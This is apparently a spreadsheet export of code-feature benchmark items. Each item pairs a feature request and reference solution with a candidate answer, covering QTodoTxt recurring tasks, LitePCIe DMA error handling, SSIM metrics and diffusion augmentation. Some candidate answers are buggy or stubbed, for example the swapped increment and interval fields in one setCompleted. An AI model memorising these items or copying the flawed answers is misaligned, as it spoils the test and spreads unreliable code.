    <t>{'called_code_segment': 'Task.setCompleted() method in tasklib.py', 'invoking_code_segment': 'test_single_task(), test_two_tasks(), test_five_tasks() and other test methods in test_file.py that create and manipulate Task objects', 'feature_description': 'Add a feature to automatically update the due date of a recurring task when it is marked as completed. When a task with recurrence is marked as completed, the due date should be automatically recalculated based on the recursion mode (originalDueDate or completitionDate) and the increment/interval values.', 'modified_complete_code': '# File 1: QTodoTxt/qtodotxt/lib/tasklib.py\n\nfrom datetime import datetime, date, time, timedelta\nimport re\n\nfrom PyQt5 import QtCore\nfrom enum import Enum\nfrom qtodotxt.lib.task_htmlizer import TaskHtmlizer\n\n\nclass recursiveMode(Enum):\n    completitionDate = 0\n    originalDueDate = 1\n\n\nclass recursion:\n    mode = None\n    increment = None\n    interval = None\n\n    def __init__(self, arg_mode, arg_increment, arg_interval):\n        self.mode = arg_mode\n        self.increment = arg_increment\n        self.interval = arg_interval\n\n\nclass Task(QtCore.QObject):\n    modified = QtCore.pyqtSignal(object)\n\n    def __init__(self, line):\n        QtCore.QObject.__init__(self)\n        settings = QtCore.QSettings()\n        self._highest_priority = \'A\'\n        self._lowest_priority = settings.value("lowest_priority", "D")\n        self._parse(line)\n\n    def __str__(self):\n        return self._text\n\n    def __repr__(self):\n        return "Task({})".format(self._text)\n\n    def _reset(self):\n        self.contexts = []\n        self.projects = []\n        self.priority = ""\n        self.is_complete = False\n        self.completion_date = None\n        self.creation_date = None\n        self.is_future = False\n        self.threshold_error = ""\n        self._text = \'\'\n        self.description = \'\'\n        self.due = None\n        self.due_error = ""\n        self.threshold = None\n        self.keywords = {}\n        self.recursion = None\n\n    def _parse(self, line):\n        self._reset()\n        words = line.split(\' \')\n        if words[0] == "x":\n            self.is_complete = True\n            words = words[1:]\n            self.completion_date = self._parseDate(words[0])\n            if self.completion_date:\n                words = words[1:]\n        elif re.search(r\'^\\([A-Z]\\)$\', words[0]):\n            self.priority = words[0][1:-1]\n            words = words[1:]\n\n        dato = self._parseDate(words[0])\n        if dato:\n            self.creation_date = dato\n            words = words[1:]\n\n        self.description = " ".join(words)\n        for word in words:\n            self._parseWord(word)\n        self._text = line\n\n    @property\n    def text(self):\n        return self._text\n\n    @text.setter\n    def text(self, txt):\n        self._parse(txt)\n        self.modified.emit(self)\n\n    def _parseWord(self, word):\n        if len(word) &gt; 1:\n            if word.startswith(\'@\'):\n                self.contexts.append(word[1:])\n            elif word.startswith(\'+\'):\n                self.projects.append(word[1:])\n            elif ":" in word:\n                key, val = word.split(":", 1)\n                self.keywords[key] = val\n                if word.startswith(\'due:\'):\n                    self.due = self._parseDateTime(word[4:])\n                    if not self.due:\n                        print("Error parsing due date \'{}\'".format(word))\n                        self.due_error = word[4:]\n                elif word.startswith(\'t:\'):\n                    self.threshold = self._parseDateTime(word[2:])\n                    if not self.threshold:\n                        print("Error parsing threshold \'{}\'".format(word))\n                        self.threshold_error = word[2:]\n                    else:\n                        if self.threshold &gt; datetime.today():\n                            self.is_future = True\n                elif word.startswith(\'rec:\'):\n                    self._parseRecurrence(word)\n\n    def _parseRecurrence(self, word):\n        if word[4] == \'+\':\n            if re.match(\'^[1-9][bdwmy]\', word[5:7]):\n                self.recursion = recursion(recursiveMode.originalDueDate, word[5], word[6])\n            else:\n                print("Error parsing recurrence \'{}\'".format(word))\n        else:\n            if re.match(\'^[1-9][bdwmy]\', word[4:6]):\n                self.recursion = recursion(recursiveMode.completitionDate, word[4], word[5])\n            else:\n                print("Error parsing recurrence \'{}\'".format(word))\n\n    def _parseDate(self, string):\n        try:\n            return datetime.strptime(string, \'%Y-%m-%d\').date()\n        except ValueError:\n            return None\n\n    def _parseDateTime(self, string):\n        try:\n            return datetime.strptime(string, \'%Y-%m-%d\')\n        except ValueError:\n            try:\n                return datetime.strptime(string, \'%Y-%m-%dT%H:%M\')\n            except ValueError:\n                return None\n\n    @property\n    def dueString(self):\n        return dateString(self.due)\n\n    @staticmethod\n    def updateDateInTask(text, newDate):\n        text = re.sub(\'\\sdue\\:[0-9]{4}\\-[0-9]{2}\\-[0-9]{2}\', \' due:\' + str(newDate)[0:10], text)\n        return text\n\n    @property\n    def thresholdString(self):\n        return dateString(self.threshold)\n\n    #New: Helper method to calculate next due date for recurring tasks\n    def _calculateNextDueDate(self):\n        if not self.recursion or not self.due:\n            return None\n        \n        increment = int(self.recursion.increment)\n        interval = self.recursion.interval\n        \n        if self.recursion.mode == recursiveMode.originalDueDate:\n            base_date = self.due\n        else:  # completitionDate mode\n            base_date = datetime.combine(self.completion_date, time.min)\n        \n        if interval == \'b\':\n            delta = timedelta(days=increment)\n        elif interval == \'d\':\n            delta = timedelta(days=increment)\n        elif interval == \'w\':\n            delta = timedelta(weeks=increment)\n        elif interval == \'m\':\n            delta = timedelta(days=increment * 30)\n        elif interval == \'y\':\n            delta = timedelta(days=increment * 365)\n        else:\n            return None\n        \n        return base_date + delta\n\n    #Modify: Updated setCompleted method to handle recurring tasks\n    def setCompleted(self):\n        if self.is_complete:\n            return\n        self.completion_date = date.today()\n        date_string = self.completion_date.strftime(\'%Y-%m-%d\')\n        self._text = \'x %s %s\' % (date_string, self._text)\n        self.is_complete = True\n        \n        #New: Calculate and update due date for recurring tasks\n        if self.recursion and self.due:\n            next_due = self._calculateNextDueDate()\n            if next_due:\n                self.due = next_due\n                self._text = self.updateDateInTask(self._text, next_due)\n        \n        self.modified.emit(self)\n\n    def setPending(self):\n        if not self.is_complete:\n            return\n        words = self._text.split(" ")\n        d = self._parseDate(words[1])\n        if d:\n            self._text = " ".join(words[2:])\n        else:\n            self._text = " ".join(words[1:])\n        self.is_complete = False\n        self.completion_date = None\n        self.modified.emit(self)\n\n    def toHtml(self):\n        htmlizer = TaskHtmlizer()\n        return htmlizer.task2html(self)\n\n    def increasePriority(self):\n        if self.is_complete:\n            return\n        if not self.priority:\n            self.priority = self._lowest_priority\n            self._text = "({}) {}".format(self.priority, self._text)\n        elif self.priority != self._highest_priority:\n            self.priority = chr(ord(self.priority) - 1)\n            self._text = "({}) {}".format(self.priority, self._text[4:])\n        self.modified.emit(self)\n\n    def decreasePriority(self):\n        if self.is_complete:\n            return\n        if self.priority &gt;= self._lowest_priority:\n            self.priority = ""\n            self._text = self._text[4:]\n            self._text = self._text.replace("({})".format(self.priority), "", 1)\n        elif self.priority:\n            oldpriority = self.priority\n            self.priority = chr(ord(self.priority) + 1)\n            self._text = self._text.replace("({})".format(oldpriority), "({})".format(self.priority), 1)\n        self.modified.emit(self)\n\n    def __eq__(self, other):\n        return self._text == other.text\n\n    def __lt__(self, other):\n        if self.is_complete != other.is_complete:\n            return self._lowerCompleteness(other)\n        if self.priority != other.priority:\n            if not self.priority:\n                return True\n            if not other.priority:\n                return False\n            return self.priority &gt; other.priority\n        return self._text &gt; other.text\n\n    def _lowerCompleteness(self, other):\n        if self.is_complete and not other.is_complete:\n            return True\n        if not self.is_complete and other.is_complete:\n            return False\n        raise RuntimeError("Could not compare completeness of 2 tasks, please report")\n\n\ndef dateString(date):\n    if date.time() == time.min:\n        return date.strftime(\'%Y-%m-%d\')\n    else:\n        return date.strftime(\'%Y-%m-%d %H:%M\')\n\n\ndef filterTasks(filters, tasks):\n    if None in filters:\n        return tasks\n\n    filteredTasks = []\n    for task in tasks:\n        for myfilter in filters:\n            if myfilter.isMatch(task):\n                filteredTasks.append(task)\n                break\n    return filteredTasks\n\n\n# File 2: QTodoTxt/qtodotxt/test/test_file.py\n\nimport unittest\nfrom tempfile import mkstemp\nfrom os import remove\nfrom datetime import date, datetime, timedelta\nfrom sys import version\n\nfrom qtodotxt.lib.file import File, ErrorLoadingFile\nfrom qtodotxt.lib.tasklib import Task\n\n\nPYTHON_VERSION = version[:3]\n\n\nif PYTHON_VERSION &lt; \'3.3\':\n    FileNotFoundError = BaseException\n\n\nclass TestFile(unittest.TestCase):\n    def setUp(self):\n        self.file = File()\n        self.tmpfile = mkstemp(text=True)[1]\n\n    def tearDown(self):\n        try:\n            remove(self.tmpfile)\n        except FileNotFoundError:\n            pass\n        except OSError as ex:\n            if ex.errno != 2:\n                raise\n        except:\n            raise\n\n    def saveAndReload(self):\n        self.file.save(self.tmpfile)\n        self.file = File()\n        self.file.load(self.tmpfile)\n\n    def test_single_task(self):\n        text = \'due:1999-10-10 do something +project1 @context1\'\n        self.file.tasks.append(Task(text))\n        self.saveAndReload()\n        self.assertEqual(self.file.tasks[0].text, text)\n        self.assertEqual(self.file.tasks[0].contexts, [\'context1\'])\n        self.assertEqual(self.file.tasks[0].projects, [\'project1\'])\n        self.assertFalse(self.file.tasks[0].is_complete)\n        self.assertFalse(self.file.tasks[0].priority)\n        self.assertEqual(self.file.tasks[0].due, datetime(1999, 10, 10))\n\n    def test_two_tasks(self):\n        task1 = \'do something +project1 @context1\'\n        task2 = \'(A) do something else +project1 @context2\'\n        self.file.tasks.extend([\n            Task(task1),\n            Task(task2)\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.tasks[0].text, task2)\n        self.assertEqual(self.file.tasks[1].text, task1)\n\n    def test_five_tasks(self):\n        task1 = Task(\'do something +project1 @context1\')\n        task2 = Task(\'(A) do something else +project1 @context2\')\n        task3 = Task(\'do something else +project1 @context2\')\n        task4 = Task(\'something else +project1 @context2\')\n        task5 = Task(\'abc +project1 @context2\')\n        self.file.tasks.extend([task1, task2, task3, task4, task5])\n        self.saveAndReload()\n        self.assertEqual(self.file.tasks[0].text, task2.text)\n        self.assertEqual(self.file.tasks[1].text, task5.text)\n        self.assertEqual(self.file.tasks[2].text, task1.text)\n        self.assertEqual(self.file.tasks[3].text, task3.text)\n        self.assertEqual(self.file.tasks[4].text, task4.text)\n\n    def test_get_all_contexts(self):\n        self.file.tasks.extend([\n            Task(\'x task with @context1\'),\n            Task(\'task with @context2\'),\n            Task(\'task with @context1 and @context2\'),\n            Task(\'task with @context1 and @context2 and @context3\')\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.getAllContexts(), {\'context1\': 2, \'context2\': 3, \'context3\': 1})\n\n    def test_get_all_incl_completed_contexts(self):\n        self.file.tasks.extend([\n            Task(\'x task with @context1\'),\n            Task(\'task with @context2\'),\n            Task(\'task with @context1 and @context2\'),\n            Task(\'x task with @context1 and @context2 and @context3\')\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.getAllContexts(True), {\'context1\': 1, \'context2\': 2, \'context3\': 0})\n\n    def test_get_all_projects(self):\n        self.file.tasks.extend([\n            Task(\'x task with +project1\'),\n            Task(\'task with +project2\'),\n            Task(\'task with +project1 and +project2\'),\n            Task(\'task with +project1 and +project2 and +project3\')\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.getAllProjects(), {\'project1\': 2, \'project2\': 3, \'project3\': 1})\n\n    def test_get_all_due_ranges(self):\n        today = date.today().strftime(\'%Y-%m-%d\')\n        yesterday = (date.today() - timedelta(days=1)).strftime(\'%Y-%m-%d\')\n\n        self.file.tasks.extend([\n            Task(\'x due:\' + today + \' completed task of today\'),\n            Task(\'due:\' + today + \' first task of today\'),\n            Task(\'due:\' + today + \' second task of today\'),\n            Task(\'due:\' + yesterday + \' task of yesterday\'),\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.getAllDueRanges()[0], {\'Today\': 2, \'This week\': 2, \'This month\': 2, \'Overdue\': 1})\n        self.assertIsInstance(self.file.getAllDueRanges()[1], dict)\n\n    def test_get_all_projects_incl_completed(self):\n        self.file.tasks.extend([\n            Task(\'x task with +project1\'),\n            Task(\'task with +project2\'),\n            Task(\'task with +project1 and +project2\'),\n            Task(\'x task with +project1 and +project2 and +project3\')\n        ])\n        self.saveAndReload()\n        self.assertEqual(self.file.getAllProjects(True), {\'project1\': 1, \'project2\': 2, \'project3\': 0})\n\n    def test_load_empty_filename(self):\n        self.assertRaises(ErrorLoadingFile, self.file.load, \'\')\n\n    def test_load_nonexisting_file(self):\n        remove(self.tmpfile)\n        self.assertRaises(ErrorLoadingFile, self.file.load, self.tmpfile)\n\n    #New: Test for recurring task completion\n    def test_recurring_task_completion(self):\n        task_text = \'due:2024-01-15 rec:1w do something weekly +project1 @context1\'\n        task = Task(task_text)\n        self.assertEqual(task.due, datetime(2024, 1, 15))\n        self.assertIsNotNone(task.recursion)\n        task.setCompleted()\n        self.assertTrue(task.is_complete)\n        self.assertIsNotNone(task.due)\n        self.assertGreater(task.due, datetime(2024, 1, 15))\n'}</t>
  </si>
  <si>
    <t>class Task(QtCore.QObject):
    # ...
    def setCompleted(self):
        """
        Set a task as completed by inserting a x and current date at the beginning of line
        """
        if self.is_complete:
            return
        self.completion_date = date.today()
        date_string = self.completion_date.strftime('%Y-%m-%d')
        self._text = 'x %s %s' % (date_string, self._text)
        self.is_complete = True
        self.modified.emit(self)
        #Modify: Update due date if task is recurring
        if self.recursion:
            if self.recursion.mode == recursiveMode.completitionDate:
                new_due_date = self.completion_date
            elif self.recursion.mode == recursiveMode.originalDueDate:
                new_due_date = self.due
            else:
                return
            if self.recursion.increment == 'd':
                new_due_date += timedelta(days=int(self.recursion.interval))
            elif self.recursion.increment == 'w':
                new_due_date += timedelta(weeks=int(self.recursion.interval))
            elif self.recursion.increment == 'm':
                new_due_date += timedelta(days=int(self.recursion.interval) * 30)
            elif self.recursion.increment == 'y':
                new_due_date += timedelta(days=int(self.recursion.interval) * 365)
            self._text = self.updateDateInTask(self._text, new_due_date)
            self.due = new_due_date
            self.modified.emit(self)
class TestFile(unittest.TestCase):
    # ...
    def test_single_task(self):
        text = 'due:1999-10-10 do something +project1 @context1 rec:1w'
        self.file.tasks.append(Task(text))
        self.saveAndReload()
        self.assertEqual(self.file.tasks[0].text, text)
        self.assertEqual(self.file.tasks[0].contexts, ['context1'])
        self.assertEqual(self.file.tasks[0].projects, ['project1'])
        self.assertFalse(self.file.tasks[0].is_complete)
        self.assertFalse(self.file.tasks[0].priority)
        self.assertEqual(self.file.tasks[0].due, datetime(1999, 10, 10))
        #Modify: Test the new feature
        self.file.tasks[0].setCompleted()
        new_due_date = datetime(1999, 10, 17)
        self.assertEqual(self.file.tasks[0].due, new_due_date)
        self.assertTrue(self.file.tasks[0].is_complete)</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class LitePCIeDMAWriter and class LitePCIeDMAReader in litepcie/litepcie/frontend/dma.py', 'invoking_code_segment': 'LitePCIeAXISlave.__init__ method instantiating LitePCIeDMAWriter and LitePCIeDMAReader in litepcie/litepcie/frontend/axi.py', 'feature_description': "Add support for a new parameter 'with_error_handling' to the LitePCIeDMAWriter and LitePCIeDMAReader classes. This parameter will enable or disable error handling during DMA operations, allowing users to control whether errors are captured and reported during DMA transfers.", 'modified_complete_code': "# File 1: litepcie/litepcie/frontend/dma.py (modifications)\n\n# In the LitePCIeDMAWriter class __init__ method:\n# #Modify - Add with_error_handling parameter\nclass LitePCIeDMAWriter(LiteXModule):\n    def __init__(self, endpoint, port, with_table=False, with_error_handling=False):\n        self.with_error_handling = with_error_handling\n        # ... existing code ...\n        # #New - Add error handling signal if enabled\n        if self.with_error_handling:\n            self.error = Signal()\n            self.error_code = Signal(8)\n        # ... rest of existing initialization ...\n\n# In the LitePCIeDMAReader class __init__ method:\n# #Modify - Add with_error_handling parameter\nclass LitePCIeDMAReader(LiteXModule):\n    def __init__(self, endpoint, port, with_table=False, with_error_handling=False):\n        self.with_error_handling = with_error_handling\n        # ... existing code ...\n        # #New - Add error handling signal if enabled\n        if self.with_error_handling:\n            self.error = Signal()\n            self.error_code = Signal(8)\n        # ... rest of existing initialization ...\n\n# File 2: litepcie/litepcie/frontend/axi.py (modifications)\n\n# In the LitePCIeAXISlave class __init__ method:\n# #Modify - Update DMA instantiation to include with_error_handling parameter\nclass LitePCIeAXISlave(LiteXModule):\n    def __init__(self, endpoint, data_width=32, id_width=1, with_error_handling=False):\n        self.axi = axi.AXIInterface(data_width=data_width, id_width=id_width)\n        # #New - Store error handling flag\n        self.with_error_handling = with_error_handling\n        # ... existing code ...\n        \n        # #Modify - Add with_error_handling to DMA Writer instantiation\n        self.dma_wr = dma_wr = LitePCIeDMAWriter(\n            endpoint = endpoint,\n            port     = port_wr,\n            with_table = False,\n            with_error_handling = with_error_handling)  # #Modify\n        \n        # ... existing fifo_wr and conv_wr code ...\n        \n        # #Modify - Add with_error_handling to DMA Reader instantiation\n        self.dma_rd = dma_rd = LitePCIeDMAReader(\n            endpoint = endpoint,\n            port     = port_rd,\n            with_table = False,\n            with_error_handling = with_error_handling)  # #Modify\n        \n        # ... rest of existing code ...\n        \n        # #New - Add error signal aggregation if error handling is enabled\n        if self.with_error_handling:\n            self.write_error = Signal()\n            self.read_error = Signal()\n            self.comb += [\n                self.write_error.eq(dma_wr.error if hasattr(dma_wr, 'error') else 0),\n                self.read_error.eq(dma_rd.error if hasattr(dma_rd, 'error') else 0),\n            ]"}</t>
  </si>
  <si>
    <t>```python
#file 1: litepcie/litepcie/frontend/dma.py
class LitePCIeDMAWriter(LiteXModule):
    def __init__(self, endpoint, port, with_table=True, with_error_handling=False):
        #Modify: Added 'with_error_handling' parameter
        # Implementation details...
        if with_error_handling:
            # New: Error handling logic
            self.error_handler = ErrorHandler()
        else:
            self.error_handler = None
class LitePCIeDMAReader(LiteXModule):
    def __init__(self, endpoint, port, with_table=True, with_error_handling=False):
        #Modify: Added 'with_error_handling' parameter
        # Implementation details...
        if with_error_handling:
            # New: Error handling logic
            self.error_handler = ErrorHandler()
        else:
            self.error_handler = None
# New: ErrorHandler class for error handling logic
class ErrorHandler(LiteXModule):
    def __init__(self):
        # Implementation details...
```
```python
#file 2: litepcie/litepcie/frontend/axi.py
self.dma_wr = dma_wr = LitePCIeDMAWriter(
    endpoint = endpoint,
    port     = port_wr,
    with_table = False,
    with_error_handling = True  #Modify: Added 'with_error_handling' parameter
)
self.dma_rd = dma_rd = LitePCIeDMAReader(
    endpoint = endpoint,
    port     = port_rd,
    with_table = False,
    with_error_handling = True  #Modify: Added 'with_error_handling' parameter
)
```</t>
  </si>
  <si>
    <t>{'called_code_segment': 'batch_PSNR(img, imclean, data_range) function in utils.py', 'invoking_code_segment': 'psnr = batch_PSNR(Out, ISource, 1.) in test.py main() function', 'feature_description': 'Add support for calculating SSIM (Structural Similarity Index) along with PSNR for image quality assessment. This includes adding a new batch_SSIM function to utils.py and modifying test.py to compute and display both PSNR and SSIM metrics.', 'modified_complete_code': '# utils.py - MODIFIED\nimport math\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom skimage.measure.simple_metrics import compare_psnr\nfrom skimage.metrics import structural_similarity as compare_ssim  # New import for SSIM\n\ndef weights_init_kaiming(m):\n    classname = m.__class__.__name__\n    if classname.find(\'Conv\') != -1:\n        nn.init.kaiming_normal(m.weight.data, a=0, mode=\'fan_in\')\n    elif classname.find(\'Linear\') != -1:\n        nn.init.kaiming_normal(m.weight.data, a=0, mode=\'fan_in\')\n    elif classname.find(\'BatchNorm\') != -1:\n        m.weight.data.normal_(mean=0, std=math.sqrt(2./9./64.)).clamp_(-0.025,0.025)\n        nn.init.constant(m.bias.data, 0.0)\n\ndef batch_PSNR(img, imclean, data_range):\n    Img = img.data.cpu().numpy().astype(np.float32)\n    Iclean = imclean.data.cpu().numpy().astype(np.float32)\n    PSNR = 0\n    for i in range(Img.shape[0]):\n        PSNR += compare_psnr(Iclean[i,:,:,:], Img[i,:,:,:], data_range=data_range)\n    return (PSNR/Img.shape[0])\n\n# New function for batch SSIM calculation\ndef batch_SSIM(img, imclean, data_range):\n    Img = img.data.cpu().numpy().astype(np.float32)\n    Iclean = imclean.data.cpu().numpy().astype(np.float32)\n    SSIM = 0\n    for i in range(Img.shape[0]):\n        SSIM += compare_ssim(Iclean[i,:,:,:], Img[i,:,:,:], data_range=data_range, channel_axis=0)\n    return (SSIM/Img.shape[0])\n\ndef data_augmentation(image, mode):\n    out = np.transpose(image, (1,2,0))\n    if mode == 0:\n        out = out\n    elif mode == 1:\n        out = np.flipud(out)\n    elif mode == 2:\n        out = np.rot90(out)\n    elif mode == 3:\n        out = np.rot90(out)\n        out = np.flipud(out)\n    elif mode == 4:\n        out = np.rot90(out, k=2)\n    elif mode == 5:\n        out = np.rot90(out, k=2)\n        out = np.flipud(out)\n    elif mode == 6:\n        out = np.rot90(out, k=3)\n    elif mode == 7:\n        out = np.rot90(out, k=3)\n        out = np.flipud(out)\n    return np.transpose(out, (2,0,1))\n\n# test.py - MODIFIED\nimport cv2\nimport os\nimport argparse\nimport glob\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom models import DnCNN\nfrom utils import *\n\nos.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"\nos.environ["CUDA_VISIBLE_DEVICES"] = "0"\n\nparser = argparse.ArgumentParser(description="DnCNN_Test")\nparser.add_argument("--num_of_layers", type=int, default=17, help="Number of total layers")\nparser.add_argument("--logdir", type=str, default="logs", help=\'path of log files\')\nparser.add_argument("--test_data", type=str, default=\'Set12\', help=\'test on Set12 or Set68\')\nparser.add_argument("--test_noiseL", type=float, default=25, help=\'noise level used on test set\')\nopt = parser.parse_args()\n\ndef normalize(data):\n    return data/255.\n\ndef main():\n    print(\'Loading model ...\\n\')\n    net = DnCNN(channels=1, num_of_layers=opt.num_of_layers)\n    device_ids = [0]\n    model = nn.DataParallel(net, device_ids=device_ids).cuda()\n    model.load_state_dict(torch.load(os.path.join(opt.logdir, \'net.pth\')))\n    model.eval()\n    print(\'Loading data info ...\\n\')\n    files_source = glob.glob(os.path.join(\'data\', opt.test_data, \'*.png\'))\n    files_source.sort()\n    # Modify: Initialize both PSNR and SSIM accumulators\n    psnr_test = 0\n    ssim_test = 0\n    for f in files_source:\n        Img = cv2.imread(f)\n        Img = normalize(np.float32(Img[:,:,0]))\n        Img = np.expand_dims(Img, 0)\n        Img = np.expand_dims(Img, 1)\n        ISource = torch.Tensor(Img)\n        noise = torch.FloatTensor(ISource.size()).normal_(mean=0, std=opt.test_noiseL/255.)\n        INoisy = ISource + noise\n        ISource, INoisy = Variable(ISource.cuda()), Variable(INoisy.cuda())\n        with torch.no_grad():\n            Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n        # Modify: Calculate both PSNR and SSIM\n        psnr = batch_PSNR(Out, ISource, 1.)\n        ssim = batch_SSIM(Out, ISource, 1.)\n        psnr_test += psnr\n        ssim_test += ssim\n        # Modify: Print both metrics\n        print("%s PSNR %f SSIM %f" % (f, psnr, ssim))\n    psnr_test /= len(files_source)\n    ssim_test /= len(files_source)\n    # Modify: Display both average metrics\n    print("\\nPSNR on test data %f" % psnr_test)\n    print("SSIM on test data %f" % ssim_test)\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'utils.py': "#Modify\nimport math\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom skimage.measure.simple_metrics import compare_psnr\nfrom skimage.metrics import structural_similarity as ssim\n\n#Modify\ndef batch_PSNR(img, imclean, data_range):\n    Img = img.data.cpu().numpy().astype(np.float32)\n    Iclean = imclean.data.cpu().numpy().astype(np.float32)\n    PSNR = 0\n    SSIM = 0\n    for i in range(Img.shape[0]):\n        PSNR += compare_psnr(Iclean[i,:,:,:], Img[i,:,:,:], data_range=data_range)\n        SSIM += ssim(Iclean[i,:,:,:], Img[i,:,:,:], data_range=data_range, multichannel=True)\n    return (PSNR/Img.shape[0]), (SSIM/Img.shape[0])\n\n#New\ndef weights_init_kaiming(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1:\n        nn.init.kaiming_normal(m.weight.data, a=0, mode='fan_in')\n    elif classname.find('Linear') != -1:\n        nn.init.kaiming_normal(m.weight.data, a=0, mode='fan_in')\n    elif classname.find('BatchNorm') != -1:\n        m.weight.data.normal_(mean=0, std=math.sqrt(2./9./64.)).clamp_(-0.025,0.025)\n        nn.init.constant(m.bias.data, 0.0)\n\n#New\ndef data_augmentation(image, mode):\n    out = np.transpose(image, (1,2,0))\n    if mode == 0:\n        out = out\n    elif mode == 1:\n        out = np.flipud(out)\n    elif mode == 2:\n        out = np.rot90(out)\n    elif mode == 3:\n        out = np.rot90(out)\n        out = np.flipud(out)\n    elif mode == 4:\n        out = np.rot90(out, k=2)\n    elif mode == 5:\n        out = np.rot90(out, k=2)\n        out = np.flipud(out)\n    elif mode == 6:\n        out = np.rot90(out, k=3)\n    elif mode == 7:\n        out = np.rot90(out, k=3)\n        out = np.flipud(out)\n    return np.transpose(out, (2,0,1))", 'test.py': '#Modify\nimport cv2\nimport os\nimport argparse\nimport glob\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom models import DnCNN\nfrom utils import *\n\nos.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"\nos.environ["CUDA_VISIBLE_DEVICES"] = "0"\n\nparser = argparse.ArgumentParser(description="DnCNN_Test")\nparser.add_argument("--num_of_layers", type=int, default=17, help="Number of total layers")\nparser.add_argument("--logdir", type=str, default="logs", help=\'path of log files\')\nparser.add_argument("--test_data", type=str, default=\'Set12\', help=\'test on Set12 or Set68\')\nparser.add_argument("--test_noiseL", type=float, default=25, help=\'noise level used on test set\')\nopt = parser.parse_args()\n\ndef normalize(data):\n    return data/255.\n\ndef main():\n    print(\'Loading model ...\\n\')\n    net = DnCNN(channels=1, num_of_layers=opt.num_of_layers)\n    device_ids = [0]\n    model = nn.DataParallel(net, device_ids=device_ids).cuda()\n    model.load_state_dict(torch.load(os.path.join(opt.logdir, \'net.pth\')))\n    model.eval()\n    print(\'Loading data info ...\\n\')\n    files_source = glob.glob(os.path.join(\'data\', opt.test_data, \'*.png\'))\n    files_source.sort()\n    psnr_test = 0\n    ssim_test = 0\n    for f in files_source:\n        Img = cv2.imread(f)\n        Img = normalize(np.float32(Img[:,:,0]))\n        Img = np.expand_dims(Img, 0)\n        Img = np.expand_dims(Img, 1)\n        ISource = torch.Tensor(Img)\n        noise = torch.FloatTensor(ISource.size()).normal_(mean=0, std=opt.test_noiseL/255.)\n        INoisy = ISource + noise\n        ISource, INoisy = Variable(ISource.cuda()), Variable(INoisy.cuda())\n        with torch.no_grad():\n            Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n        psnr, ssim = batch_PSNR(Out, ISource, 1.)\n        psnr_test += psnr\n        ssim_test += ssim\n        print("%s PSNR %f SSIM %f" % (f, psnr, ssim))\n    psnr_test /= len(files_source)\n    ssim_test /= len(files_source)\n    print("\\nPSNR on test data %f SSIM on test data %f" % (psnr_test, ssim_test))\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'load_data() function in dist_util.py and image_datasets module', 'invoking_code_segment': 'main() function in image_train.py that calls load_data()', 'feature_description': 'Add support for data augmentation during training by extending the load_data function to accept augmentation parameters and apply transformations to the dataset', 'modified_complete_code': '# File 1: improved-diffusion/improved_diffusion/dist_util.py\n# (No changes needed in dist_util.py for this feature)\n\n# File 2: improved-diffusion/scripts/image_train.py\n"""\nTrain a diffusion model on images.\n"""\n\nimport argparse\n\nfrom improved_diffusion import dist_util, logger\nfrom improved_diffusion.image_datasets import load_data\nfrom improved_diffusion.resample import create_named_schedule_sampler\nfrom improved_diffusion.script_util import (\n    model_and_diffusion_defaults,\n    create_model_and_diffusion,\n    args_to_dict,\n    add_dict_to_argparser,\n)\nfrom improved_diffusion.train_util import TrainLoop\n\n\ndef main():\n    args = create_argparser().parse_args()\n\n    dist_util.setup_dist()\n    logger.configure()\n\n    logger.log("creating model and diffusion...")\n    model, diffusion = create_model_and_diffusion(\n        **args_to_dict(args, model_and_diffusion_defaults().keys())\n    )\n    model.to(dist_util.dev())\n    schedule_sampler = create_named_schedule_sampler(args.schedule_sampler, diffusion)\n\n    logger.log("creating data loader...")\n    # #Modify: Added augmentation parameters to load_data call\n    data = load_data(\n        data_dir=args.data_dir,\n        batch_size=args.batch_size,\n        image_size=args.image_size,\n        class_cond=args.class_cond,\n        augment=args.augment,\n        augment_prob=args.augment_prob,\n        augment_types=args.augment_types,\n    )\n\n    logger.log("training...")\n    TrainLoop(\n        model=model,\n        diffusion=diffusion,\n        data=data,\n        batch_size=args.batch_size,\n        microbatch=args.microbatch,\n        lr=args.lr,\n        ema_rate=args.ema_rate,\n        log_interval=args.log_interval,\n        save_interval=args.save_interval,\n        resume_checkpoint=args.resume_checkpoint,\n        use_fp16=args.use_fp16,\n        fp16_scale_growth=args.fp16_scale_growth,\n        schedule_sampler=schedule_sampler,\n        weight_decay=args.weight_decay,\n        lr_anneal_steps=args.lr_anneal_steps,\n    ).run_loop()\n\n\ndef create_argparser():\n    defaults = dict(\n        data_dir="",\n        schedule_sampler="uniform",\n        lr=1e-4,\n        weight_decay=0.0,\n        lr_anneal_steps=0,\n        batch_size=1,\n        microbatch=-1,  # -1 disables microbatches\n        ema_rate="0.9999",  # comma-separated list of EMA values\n        log_interval=10,\n        save_interval=10000,\n        resume_checkpoint="",\n        use_fp16=False,\n        fp16_scale_growth=1e-3,\n        # #New: Added data augmentation parameters\n        augment=False,\n        augment_prob=0.5,\n        augment_types="flip,rotate,brightness",\n    )\n    defaults.update(model_and_diffusion_defaults())\n    parser = argparse.ArgumentParser()\n    add_dict_to_argparser(parser, defaults)\n    return parser\n\n\nif __name__ == "__main__":\n    main()\n\n# File 3: improved-diffusion/improved_diffusion/image_datasets.py (New/Modified)\n# #New: Enhanced load_data function with augmentation support\n"""\nImage dataset loading with augmentation support.\n"""\n\nimport torch\nfrom torchvision import transforms\n\n\ndef load_data(\n    data_dir,\n    batch_size,\n    image_size,\n    class_cond=False,\n    augment=False,\n    augment_prob=0.5,\n    augment_types="flip,rotate,brightness",\n    num_workers=4,\n):\n    """\n    Load image dataset with optional augmentation.\n    \n    